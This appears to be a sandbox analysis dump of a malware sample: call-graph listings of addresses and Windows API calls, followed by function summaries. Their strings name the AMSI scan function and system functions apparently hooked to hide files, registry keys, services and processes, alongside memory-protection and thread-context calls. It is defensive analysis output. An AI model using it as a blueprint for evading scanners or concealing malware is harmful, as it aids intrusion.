_CreateFrameInfo 9 API calls 17326->17330 17329 2241390a5d5 17327->17329 17332 224139099cc Is_bad_exception_allowed 9 API calls 17327->17332 17381 22413909a0c 17328->17381 17335 2241390b1dc 9 API calls 17329->17335 17333 2241390a6dd 17330->17333 17332->17329 17336 22413909324 _CreateFrameInfo 9 API calls 17333->17336 17338 2241390a5eb 17335->17338 17337 2241390a6e6 17336->17337 17340 2241390c2f4 14 API calls 17337->17340 17342 22413909634 __SetUnwindTryBlock RtlLookupFunctionEntry 17338->17342 17338->17348 17339 22413909324 _CreateFrameInfo 9 API calls 17341 2241390a335 17339->17341 17340->17307 17341->17309 17344 22413909324 _CreateFrameInfo 9 API calls 17341->17344 17343 2241390a605 17342->17343 17420 22413909838 RtlUnwindEx 17343->17420 17347 2241390a341 17344->17347 17345 224139099e0 9 API calls 17345->17353 17349 22413909324 _CreateFrameInfo 9 API calls 17347->17349 17348->17311 17351 2241390a34a 17349->17351 17384 2241390b1dc 17351->17384 17353->17315 17353->17345 17395 2241390a96c 17353->17395 17409 2241390a158 17353->17409 17356 2241390a35e 17391 2241390b2cc 17356->17391 17358 2241390a6d1 17359 2241390c2f4 14 API calls 17358->17359 17359->17326 17360 2241390a366 __CxxCallCatchBlock std::bad_alloc::bad_alloc 17360->17358 17361 22413909178 Concurrency::cancel_current_task 2 API calls 17360->17361 17361->17358 17363 22413909662 __FrameHandler3::ExecutionInCatch 17362->17363 17364 2241390968c RtlLookupFunctionEntry 17363->17364 17365 224139096d4 17363->17365 17364->17363 17365->17294 17367 2241390958b 17366->17367 17368 22413909560 17366->17368 17367->17297 17368->17367 17369 22413909324 _CreateFrameInfo 9 API calls 17368->17369 17369->17368 17371 2241390b169 __FrameHandler3::ExecutionInCatch 17370->17371 17372 22413909634 __SetUnwindTryBlock RtlLookupFunctionEntry 17371->17372 17373 2241390b17e 17372->17373 17435 22413909db4 17373->17435 17376 2241390b190 __FrameHandler3::GetHandlerSearchState 17438 22413909dec 17376->17438 17377 2241390b1b3 17378 22413909db4 __GetUnwindTryBlock RtlLookupFunctionEntry 17377->17378 17380 2241390a28e 17378->17380 17380->17307 17380->17309 17380->17312 17382 22413909324 _CreateFrameInfo 9 API calls 17381->17382 17383 22413909a1a 17382->17383 17383->17307 17383->17339 17385 2241390b2c3 17384->17385 17390 2241390b207 17384->17390 17386 2241390a35a 17386->17309 17386->17356 17387 224139099e0 9 API calls 17387->17390 17388 224139099cc Is_bad_exception_allowed 9 API calls 17388->17390 17389 2241390a96c 9 API calls 17389->17390 17390->17386 17390->17387 17390->17388 17390->17389 17393 2241390b2e9 Is_bad_exception_allowed 17391->17393 17394 2241390b339 17391->17394 17392 224139099cc 9 API calls Is_bad_exception_allowed 17392->17393 17393->17392 17393->17394 17394->17360 17396 2241390aa28 17395->17396 17397 2241390a999 17395->17397 17396->17353 17398 224139099cc Is_bad_exception_allowed 9 API calls 17397->17398 17399 2241390a9a2 17398->17399 17399->17396 17400 224139099cc Is_bad_exception_allowed 9 API calls 17399->17400 17401 2241390a9bb 17399->17401 17400->17401 17401->17396 17402 2241390a9e7 17401->17402 17403 224139099cc Is_bad_exception_allowed 9 API calls 17401->17403 17404 224139099e0 9 API calls 17402->17404 17403->17402 17405 2241390a9fb 17404->17405 17405->17396 17406 2241390aa14 17405->17406 17407 224139099cc Is_bad_exception_allowed 9 API calls 17405->17407 17408 224139099e0 9 API calls 17406->17408 17407->17406 17408->17396 17410 22413909634 __SetUnwindTryBlock RtlLookupFunctionEntry 17409->17410 17411 2241390a195 17410->17411 17412 224139099cc Is_bad_exception_allowed 9 API calls 17411->17412 17413 2241390a1cd 17412->17413 17414 22413909838 9 API calls 17413->17414 17415 2241390a211 17414->17415 17415->17353 17417 224139095b8 __FrameHandler3::ExecutionInCatch 17416->17417 17418 22413909540 __FrameHandler3::ExecutionInCatch 9 API calls 17417->17418 17419 224139095c2 17418->17419 17419->17324 17421 22413908070 _invalid_parameter_noinfo 8 API calls 17420->17421 17422 22413909932 17421->17422 17422->17348 17424 2241390a735 17423->17424 17428 2241390a948 17423->17428 17425 22413909324 _CreateFrameInfo 9 API calls 17424->17425 17426 2241390a73a 17425->17426 17427 2241390a759 EncodePointer 17426->17427 17430 2241390a7ac 17426->17430 17429 22413909324 _CreateFrameInfo 9 API calls 17427->17429 17428->17348 17431 2241390a769 17429->17431 17430->17428 17433 224139099cc 9 API calls Is_bad_exception_allowed 17430->17433 17434 2241390a158 19 API calls 17430->17434 17431->17430 17441 224139094ec 17431->17441 17433->17430 17434->17430 17436 22413909634 __SetUnwindTryBlock RtlLookupFunctionEntry 17435->17436 17437 22413909dc7 17436->17437 17437->17376 17437->17377 17439 22413909634 __SetUnwindTryBlock RtlLookupFunctionEntry 17438->17439 17440 22413909e06 17439->17440 17440->17380 17442 22413909324 _CreateFrameInfo 9 API calls 17441->17442 17443 22413909518 17442->17443 17443->17430 16365 2241390b0d4 16372 2241390b007 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 16365->16372 16366 2241390b0fb 16367 22413909324 _CreateFrameInfo 9 API calls 16366->16367 16369 2241390b100 16367->16369 16368 2241390b10b __FrameHandler3::GetHandlerSearchState 16369->16368 16370 22413909324 _CreateFrameInfo 9 API calls 16369->16370 16370->16368 16371 224139099cc 9 API calls Is_bad_exception_allowed 16371->16372 16372->16366 16372->16368 16372->16371 16374 224139099f4 16372->16374 16375 22413909324 _CreateFrameInfo 9 API calls 16374->16375 16376 22413909a02 16375->16376 16376->16372 17625 22413902ed8 17627 22413902f35 17625->17627 17626 22413902f50 17627->17626 17628 224139038a8 3 API calls 17627->17628 17628->17626 18550 2241390c1d8 18551 2241390c1f1 18550->18551 18552 2241390c209 18550->18552 18551->18552 18553 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18551->18553 18553->18552 18554 224139025dc 18555 2241390265a 18554->18555 18556 224139026bf GetFileType 18555->18556 18564 22413902777 18555->18564 18557 224139026cd StrCpyW 18556->18557 18558 224139026e1 18556->18558 18561 224139026ee 18557->18561 18559 22413901ad4 4 API calls 18558->18559 18559->18561 18560 22413903f88 StrCmpNIW 18560->18561 18561->18560 18562 22413903708 4 API calls 18561->18562 18563 22413901dd4 2 API calls 18561->18563 18561->18564 18562->18561 18563->18561 17639 2241390f6dc 17640 2241390f6e8 17639->17640 17642 2241390f70f 17640->17642 17643 22413911c0c 17640->17643 17644 22413911c4c 17643->17644 17645 22413911c11 17643->17645 17644->17640 17646 22413911c44 17645->17646 17647 22413911c32 DeleteCriticalSection 17645->17647 17648 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17646->17648 17647->17646 17647->17647 17648->17644 17659 224139106e0 17660 224139106e9 17659->17660 17661 224139106f9 17659->17661 17662 2241390d1f4 __std_exception_copy 13 API calls 17660->17662 17663 224139106ee 17662->17663 17664 2241390d04c _invalid_parameter_noinfo 38 API calls 17663->17664 17664->17661 16799 224139063e3 16800 224139063f0 16799->16800 16801 224139063fc GetThreadContext 16800->16801 16808 2241390655a 16800->16808 16802 22413906422 16801->16802 16801->16808 16807 22413906449 16802->16807 16802->16808 16803 2241390663e 16805 2241390665e 16803->16805 16809 22413904b20 VirtualFree 16803->16809 16804 22413906581 VirtualProtect FlushInstructionCache 16804->16808 16806 22413905530 3 API calls 16805->16806 16813 22413906663 16806->16813 16810 224139064cd 16807->16810 16811 224139064a6 SetThreadContext 16807->16811 16808->16803 16808->16804 16809->16805 16811->16810 16812 22413906677 ResumeThread 16812->16813 16813->16812 16814 224139066b7 16813->16814 16815 22413908070 _invalid_parameter_noinfo 8 API calls 16814->16815 16816 224139066ff 16815->16816 14910 22413901bc4 14917 22413901724 GetProcessHeap HeapAlloc 14910->14917 14912 22413901bd3 14913 22413901bda SleepEx 14912->14913 14916 2241390159c StrCmpIW StrCmpW 14912->14916 14968 224139019b0 14912->14968 14914 22413901724 50 API calls 14913->14914 14914->14912 14916->14912 14985 22413901264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14917->14985 14919 2241390174c 14986 22413901000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14919->14986 14921 22413901754 14987 22413901264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14921->14987 14923 2241390175d 14988 22413901264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14923->14988 14925 22413901766 14989 22413901264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14925->14989 14927 2241390176f 14990 22413901000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14927->14990 14929 22413901778 14991 22413901000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14929->14991 14931 22413901781 14992 22413901000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14931->14992 14933 2241390178a RegOpenKeyExW 14934 224139017bc RegOpenKeyExW 14933->14934 14935 224139019a2 14933->14935 14936 224139017e5 14934->14936 14937 224139017fb RegOpenKeyExW 14934->14937 14935->14912 14993 224139012b8 RegQueryInfoKeyW 14936->14993 14939 22413901836 RegOpenKeyExW 14937->14939 14940 2241390181f 14937->14940 14943 2241390185a 14939->14943 14944 22413901871 RegOpenKeyExW 14939->14944 15002 2241390104c RegQueryInfoKeyW 14940->15002 14946 224139012b8 16 API calls 14943->14946 14947 22413901895 14944->14947 14948 224139018ac RegOpenKeyExW 14944->14948 14949 22413901867 RegCloseKey 14946->14949 14950 224139012b8 16 API calls 14947->14950 14951 224139018e7 RegOpenKeyExW 14948->14951 14952 224139018d0 14948->14952 14949->14944 14956 224139018a2 RegCloseKey 14950->14956 14954 2241390190b 14951->14954 14955 22413901922 RegOpenKeyExW 14951->14955 14953 224139012b8 16 API calls 14952->14953 14957 224139018dd RegCloseKey 14953->14957 14958 2241390104c 6 API calls 14954->14958 14959 22413901946 14955->14959 14960 2241390195d RegOpenKeyExW 14955->14960 14956->14948 14957->14951 14961 22413901918 RegCloseKey 14958->14961 14962 2241390104c 6 API calls 14959->14962 14963 22413901998 RegCloseKey 14960->14963 14964 22413901981 14960->14964 14961->14955 14965 22413901953 RegCloseKey 14962->14965 14963->14935 14966 2241390104c 6 API calls 14964->14966 14965->14960 14967 2241390198e RegCloseKey 14966->14967 14967->14963 15012 224139014a0 14968->15012 14985->14919 14986->14921 14987->14923 14988->14925 14989->14927 14990->14929 14991->14931 14992->14933 14994 22413901486 RegCloseKey 14993->14994 14995 22413901323 GetProcessHeap HeapAlloc 14993->14995 14994->14937 14996 2241390134e RegEnumValueW 14995->14996 14997 22413901472 GetProcessHeap HeapFree 14995->14997 14998 224139013a1 14996->14998 14997->14994 14998->14996 14998->14997 15000 2241390141a lstrlenW GetProcessHeap HeapAlloc StrCpyW 14998->15000 15001 224139013cf GetProcessHeap HeapAlloc GetProcessHeap HeapFree 14998->15001 15007 22413901530 14998->15007 15000->14998 15001->15000 15003 224139011b5 RegCloseKey 15002->15003 15005 224139010bf 15002->15005 15003->14939 15004 224139010cf RegEnumValueW 15004->15005 15005->15003 15005->15004 15006 2241390114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 15005->15006 15006->15005 15008 2241390154a 15007->15008 15011 22413901580 15007->15011 15009 22413901569 StrCmpW 15008->15009 15010 22413901561 StrCmpIW 15008->15010 15008->15011 15009->15008 15010->15008 15011->14998 15013 224139014e2 GetProcessHeap HeapFree GetProcessHeap HeapFree 15012->15013 15014 224139014c2 GetProcessHeap HeapFree 15012->15014 15014->15013 15014->15014 16817 22413931bc4 16824 22413931724 GetProcessHeap HeapAlloc 16817->16824 16819 22413931bd3 16820 22413931bda Sleep 16819->16820 16823 2241393159c StrCmpIW StrCmpW 16819->16823 16875 224139319b0 16819->16875 16821 22413931724 50 API calls 16820->16821 16821->16819 16823->16819 16892 22413931264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 16824->16892 16826 2241393174c 16893 22413931000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 16826->16893 16828 22413931754 16894 22413931264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 16828->16894 16830 2241393175d 16895 22413931264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 16830->16895 16832 22413931766 16896 22413931264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 16832->16896 16834 2241393176f 16897 22413931000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 16834->16897 16836 22413931778 16898 22413931000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 16836->16898 16838 22413931781 16899 22413931000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 16838->16899 16840 2241393178a RegOpenKeyExW 16841 224139317bc RegOpenKeyExW 16840->16841 16842 224139319a2 16840->16842 16843 224139317e5 16841->16843 16844 224139317fb RegOpenKeyExW 16841->16844 16842->16819 16900 224139312b8 RegQueryInfoKeyW 16843->16900 16846 22413931836 RegOpenKeyExW 16844->16846 16847 2241393181f 16844->16847 16850 2241393185a 16846->16850 16851 22413931871 RegOpenKeyExW 16846->16851 16909 2241393104c RegQueryInfoKeyW 16847->16909 16853 224139312b8 16 API calls 16850->16853 16854 22413931895 16851->16854 16855 224139318ac RegOpenKeyExW 16851->16855 16858 22413931867 RegCloseKey 16853->16858 16859 224139312b8 16 API calls 16854->16859 16856 224139318e7 RegOpenKeyExW 16855->16856 16857 224139318d0 16855->16857 16862 2241393190b 16856->16862 16863 22413931922 RegOpenKeyExW 16856->16863 16861 224139312b8 16 API calls 16857->16861 16858->16851 16860 224139318a2 RegCloseKey 16859->16860 16860->16855 16864 224139318dd RegCloseKey 16861->16864 16865 2241393104c 6 API calls 16862->16865 16866 22413931946 16863->16866 16867 2241393195d RegOpenKeyExW 16863->16867 16864->16856 16868 22413931918 RegCloseKey 16865->16868 16869 2241393104c 6 API calls 16866->16869 16870 22413931998 RegCloseKey 16867->16870 16871 22413931981 16867->16871 16868->16863 16872 22413931953 RegCloseKey 16869->16872 16870->16842 16873 2241393104c 6 API calls 16871->16873 16872->16867 16874 2241393198e RegCloseKey 16873->16874 16874->16870 16914 224139314a0 16875->16914 16892->16826 16893->16828 16894->16830 16895->16832 16896->16834 16897->16836 16898->16838 16899->16840 16901 22413931486 RegCloseKey 16900->16901 16902 22413931323 GetProcessHeap HeapAlloc 16900->16902 16901->16844 16903 2241393134e RegEnumValueW 16902->16903 16904 22413931472 GetProcessHeap HeapFree 16902->16904 16905 224139313a1 16903->16905 16904->16901 16905->16903 16905->16904 16906 22413931530 2 API calls 16905->16906 16907 2241393141a lstrlenW GetProcessHeap HeapAlloc StrCpyW 16905->16907 16908 224139313cf GetProcessHeap HeapAlloc GetProcessHeap HeapFree 16905->16908 16906->16905 16907->16905 16908->16907 16910 224139311b5 RegCloseKey 16909->16910 16913 224139310bf 16909->16913 16910->16846 16911 224139310cf RegEnumValueW 16911->16913 16912 2241393114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 16912->16913 16913->16910 16913->16911 16913->16912 16915 224139314e2 GetProcessHeap HeapFree GetProcessHeap HeapFree 16914->16915 16916 224139314c2 GetProcessHeap HeapFree 16914->16916 16916->16915 16916->16916 16917 22413905fcc 16920 22413905fd3 16917->16920 16918 22413906000 VirtualProtect 16919 22413906029 GetLastError 16918->16919 16921 22413905f10 16918->16921 16919->16921 16920->16918 16920->16921 18579 224139119d0 18580 2241390e864 56 API calls 18579->18580 18581 224139119d9 18580->18581 17671 224139146f5 17672 22413909324 _CreateFrameInfo 9 API calls 17671->17672 17673 2241391470d 17672->17673 17674 22413909324 _CreateFrameInfo 9 API calls 17673->17674 17675 22413914728 17674->17675 17676 22413909324 _CreateFrameInfo 9 API calls 17675->17676 17677 2241391473c 17676->17677 17678 22413909324 _CreateFrameInfo 9 API calls 17677->17678 17679 2241391477e 17678->17679 16927 22413905ff9 16928 22413906000 VirtualProtect 16927->16928 16929 22413906029 GetLastError 16928->16929 16930 22413905f10 16928->16930 16929->16930 18582 224139041f9 18585 22413904146 18582->18585 18583 224139041b0 18584 22413904196 VirtualQuery 18584->18583 18584->18585 18585->18583 18585->18584 18586 224139041ca VirtualAlloc 18585->18586 18586->18583 18587 224139041fb GetLastError 18586->18587 18587->18583 18587->18585 16935 2241390cbfc 16940 2241390f3a0 16935->16940 16937 2241390cc05 16938 2241390cb10 __std_exception_copy 13 API calls 16937->16938 16939 2241390cc22 __vcrt_uninitialize_ptd 16937->16939 16938->16939 16941 2241390f3b1 16940->16941 16942 2241390f3b5 16940->16942 16941->16937 16942->16941 16943 2241390ef88 9 API calls 16942->16943 16943->16941 16389 2241390b500 16394 2241390c558 EnterCriticalSection 16389->16394 17689 22413902300 17690 22413902331 17689->17690 17691 22413902447 17690->17691 17697 22413902355 17690->17697 17698 22413902412 17690->17698 17692 224139024bb 17691->17692 17693 2241390244c 17691->17693 17696 224139035c8 11 API calls 17692->17696 17692->17698 17706 224139035c8 GetProcessHeap HeapAlloc 17693->17706 17695 2241390238d StrCmpNIW 17695->17697 17696->17698 17697->17695 17697->17698 17700 22413901d30 17697->17700 17701 22413901db4 17700->17701 17702 22413901d57 GetProcessHeap HeapAlloc 17700->17702 17701->17697 17702->17701 17703 22413901d92 17702->17703 17704 22413901cfc 2 API calls 17703->17704 17705 22413901d9a GetProcessHeap HeapFree 17704->17705 17705->17701 17707 2241390361b 17706->17707 17708 224139036d9 GetProcessHeap HeapFree 17707->17708 17709 224139036d4 17707->17709 17710 22413903666 StrCmpNIW 17707->17710 17711 22413901d30 6 API calls 17707->17711 17708->17698 17709->17708 17710->17707 17711->17707 16953 2241390f3e4 16954 2241390f41d 16953->16954 16955 2241390f3ee 16953->16955 16955->16954 16956 2241390f403 FreeLibrary 16955->16956 16956->16955 16957 224139133e4 16958 224139133f5 CloseHandle 16957->16958 16959 224139133fb 16957->16959 16958->16959 16960 224139027e8 16962 22413902867 16960->16962 16961 22413902998 16962->16961 16963 224139028c9 GetFileType 16962->16963 16964 224139028d7 StrCpyW 16963->16964 16965 224139028ed 16963->16965 16966 224139028fc 16964->16966 16976 22413901ad4 GetFinalPathNameByHandleW 16965->16976 16970 2241390299d 16966->16970 16974 22413902906 16966->16974 16968 22413903f88 StrCmpNIW 16968->16970 16969 22413903f88 StrCmpNIW 16969->16974 16970->16961 16970->16968 16971 22413903708 4 API calls 16970->16971 16972 22413901dd4 2 API calls 16970->16972 16971->16970 16972->16970 16974->16961 16974->16969 16981 22413903708 StrCmpIW 16974->16981 16985 22413901dd4 16974->16985 16977 22413901b3d 16976->16977 16978 22413901afe StrCmpNIW 16976->16978 16977->16966 16978->16977 16979 22413901b18 lstrlenW 16978->16979 16979->16977 16980 22413901b2a StrCpyW 16979->16980 16980->16977 16982 2241390373a StrCpyW StrCatW 16981->16982 16983 22413903751 PathCombineW 16981->16983 16984 2241390375a 16982->16984 16983->16984 16984->16974 16986 22413901deb 16985->16986 16987 22413901df4 16985->16987 16988 22413901530 2 API calls 16986->16988 16987->16974 16988->16987 17026 2241390b7ea 17027 2241390c2f4 14 API calls 17026->17027 17028 2241390b7ef 17027->17028 17029 2241390b815 GetModuleHandleW 17028->17029 17030 2241390b85f 17028->17030 17029->17030 17034 2241390b822 17029->17034 17043 2241390b6f8 17030->17043 17034->17030 17038 2241390b904 GetModuleHandleExW 17034->17038 17039 2241390b938 GetProcAddress 17038->17039 17042 2241390b94a 17038->17042 17039->17042 17040 2241390b95b FreeLibrary 17041 2241390b962 17040->17041 17041->17030 17042->17040 17042->17041 17055 2241390c558 EnterCriticalSection 17043->17055 16401 2241390acec 16404 224139090c0 16401->16404 16403 2241390ad15 16405 224139090e1 16404->16405 16406 22413909116 16404->16406 16405->16406 16407 2241390c328 __std_exception_copy 38 API calls 16405->16407 16406->16403 16407->16406 17085 22413902ff0 17086 22413903061 17085->17086 17087 22413903384 17086->17087 17088 2241390308d GetModuleHandleA 17086->17088 17089 2241390309f GetProcAddress 17088->17089 17090 224139030b1 17088->17090 17089->17090 17090->17087 17091 224139030d8 StrCmpNIW 17090->17091 17091->17087 17095 224139030fd 17091->17095 17092 22413901a30 6 API calls 17092->17095 17093 2241390320f lstrlenW 17093->17095 17094 224139032b9 lstrlenW 17094->17095 17095->17087 17095->17092 17095->17093 17095->17094 17096 22413901cfc StrCmpIW StrCmpW 17095->17096 17097 22413903f88 StrCmpNIW 17095->17097 17096->17095 17097->17095 16415 22413902518 GetProcessIdOfThread GetCurrentProcessId 16416 224139025be 16415->16416 16417 22413902543 CreateFileW 16415->16417 16417->16416 16418 22413902577 WriteFile ReadFile CloseHandle 16417->16418 16418->16416 18603 2241390c218 18604 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18603->18604 18605 2241390c228 18604->18605 18606 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18605->18606 18607 2241390c23c 18606->18607 18608 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18607->18608 18609 2241390c250 18608->18609 18610 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18609->18610 18611 2241390c264 18610->18611 17735 22413904320 17737 2241390426d 17735->17737 17736 224139042bd VirtualQuery 17736->17737 17738 224139042d7 17736->17738 17737->17736 17737->17738 17739 22413904322 GetLastError 17737->17739 17739->17737 17120 2241390f820 17123 2241390f7d8 17120->17123 17128 2241390c558 EnterCriticalSection 17123->17128 18624 2241390fe20 18625 2241390fe4a 18624->18625 18626 2241390d220 __std_exception_copy 13 API calls 18625->18626 18627 2241390fe6a 18626->18627 18628 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18627->18628 18629 2241390fe78 18628->18629 18630 2241390fea2 18629->18630 18631 2241390d220 __std_exception_copy 13 API calls 18629->18631 18632 2241390fec1 InitializeCriticalSectionEx 18630->18632 18635 2241390feab 18630->18635 18633 2241390fe94 18631->18633 18632->18630 18634 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18633->18634 18634->18630 17745 22413908f0c 17752 2241390946c 17745->17752 17751 22413908f19 17753 22413909474 17752->17753 17755 224139094a5 17753->17755 17756 22413908f15 17753->17756 17769 22413909d28 17753->17769 17757 224139094b4 __vcrt_uninitialize_locks DeleteCriticalSection 17755->17757 17756->17751 17758 22413909400 17756->17758 17757->17756 17774 22413909bfc 17758->17774 17770 22413909aac __vcrt_InitializeCriticalSectionEx 5 API calls 17769->17770 17771 22413909d5e 17770->17771 17772 22413909d73 InitializeCriticalSectionAndSpinCount 17771->17772 17773 22413909d68 17771->17773 17772->17773 17773->17753 17775 22413909aac __vcrt_InitializeCriticalSectionEx 5 API calls 17774->17775 17776 22413909c21 TlsAlloc 17775->17776 18636 2241390820c 18643 22413908f34 18636->18643 18639 22413908219 18644 22413909340 _CreateFrameInfo 9 API calls 18643->18644 18645 22413908215 18644->18645 18645->18639 18646 2241390c288 18645->18646 18647 2241390cb10 __std_exception_copy 13 API calls 18646->18647 18648 22413908222 18647->18648 18648->18639 18649 22413908f48 18648->18649 18652 224139092dc 18649->18652 18651 22413908f51 18651->18639 18653 22413909302 18652->18653 18654 224139092ed 18652->18654 18653->18651 18655 22413909c8c _CreateFrameInfo 6 API calls 18654->18655 18656 224139092f2 18655->18656 18658 22413909cd4 18656->18658 18659 22413909aac __vcrt_InitializeCriticalSectionEx 5 API calls 18658->18659 18660 22413909d02 18659->18660 18661 22413909d14 TlsSetValue 18660->18661 18662 22413909d0c 18660->18662 18661->18662 18662->18653 18691 22413914611 __scrt_dllmain_exception_filter 16431 2241390c510 16432 2241390c518 16431->16432 16434 2241390c545 16432->16434 16435 2241390c574 16432->16435 16436 2241390c59f 16435->16436 16437 2241390c5a3 16436->16437 16438 2241390c582 DeleteCriticalSection 16436->16438 16437->16434 16438->16436

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true
                              • Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd
                              Similarity
                              • API ID: AddressLibraryLoadProcSleep
                              • String ID: AmsiScanBuffer$amsi.dll
                              • API String ID: 188063004-3248079830
                              • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                              • Instruction ID: eebeb8a29fa49e01195493694a2b93b69af760d161bceaf177bfc175cfd01240
                              • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                              • Instruction Fuzzy Hash: 7BD06764A32640F6EE097BD1E85D3583A61AB64F59FC90415CD0E192A8DF2C8DF98740

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true
                              • Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd
                              Similarity
                              • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                              • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                              • API String ID: 1735320900-4225371247
                              • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                              • Instruction ID: a8a089ed4d0a3858e3c828d528970c5a6fa3cb24ef171cfa9fbaafc62c612bfe
                              • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                              • Instruction Fuzzy Hash: 81517FA8130A4AB6EF05FFE8E8497D43B24A74476CF8445529C4D1A16DDF388AFAC780

                              Control-flow Graph

                              APIs
                              • GetModuleFileNameW.KERNEL32 ref: 0000022413903A35
                              • PathFindFileNameW.SHLWAPI ref: 0000022413903A44
                                • Part of subcall function 0000022413903F88: StrCmpNIW.SHLWAPI(?,?,?,000002241390272F), ref: 0000022413903FA0
                                • Part of subcall function 0000022413903EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,0000022413903A5B), ref: 0000022413903EDB
                                • Part of subcall function 0000022413903EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,0000022413903A5B), ref: 0000022413903F0E
                                • Part of subcall function 0000022413903EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,0000022413903A5B), ref: 0000022413903F2E
                                • Part of subcall function 0000022413903EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,0000022413903A5B), ref: 0000022413903F47
                                • Part of subcall function 0000022413903EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,0000022413903A5B), ref: 0000022413903F68
                              • CreateThread.KERNELBASE ref: 0000022413903A8B
                                • Part of subcall function 0000022413901E74: GetCurrentThread.KERNEL32 ref: 0000022413901E7F
                                • Part of subcall function 0000022413901E74: CreateThread.KERNELBASE ref: 0000022413902043
                                • Part of subcall function 0000022413901E74: TlsAlloc.KERNEL32 ref: 0000022413902049
                                • Part of subcall function 0000022413901E74: TlsAlloc.KERNEL32 ref: 0000022413902055
                                • Part of subcall function 0000022413901E74: TlsAlloc.KERNEL32 ref: 0000022413902061
                                • Part of subcall function 0000022413901E74: TlsAlloc.KERNEL32 ref: 000002241390206D
                                • Part of subcall function 0000022413901E74: TlsAlloc.KERNEL32 ref: 0000022413902079
                                • Part of subcall function 0000022413901E74: TlsAlloc.KERNEL32 ref: 0000022413902085
                              Memory Dump Source
                              • Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true
                              • Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd
                              Similarity
                              • API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
                              • String ID:
                              • API String ID: 2779030803-0
